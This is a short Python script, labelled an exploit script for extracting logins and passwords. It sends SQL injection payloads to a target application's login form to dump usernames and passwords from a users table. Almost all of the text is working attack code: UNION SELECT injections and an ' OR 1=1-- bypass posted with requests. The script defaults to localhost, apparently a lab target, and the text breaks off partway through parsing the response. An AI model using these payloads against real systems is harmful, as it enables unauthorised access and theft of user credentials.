#!/usr/bin/env python3 import requests import re import argparse parser = argparse.ArgumentParser(description="Exploit script for extracting logins and passwords.") parser.add_argument("--base-url", default="http://localhost:80", help="Base URL of the target application") args = parser.parse_args() BASE_URL = args.base_url login_payload = "' UNION SELECT login FROM users--" form_data = {"login": login_payload, "password": "' OR 1=1--"} response_logins = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True) password_payload = "' UNION SELECT password FROM users--" form_data = {"login": password_payload, "password": "' OR 1=1--"} response_passwords = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True) logins_raw = re.search(r"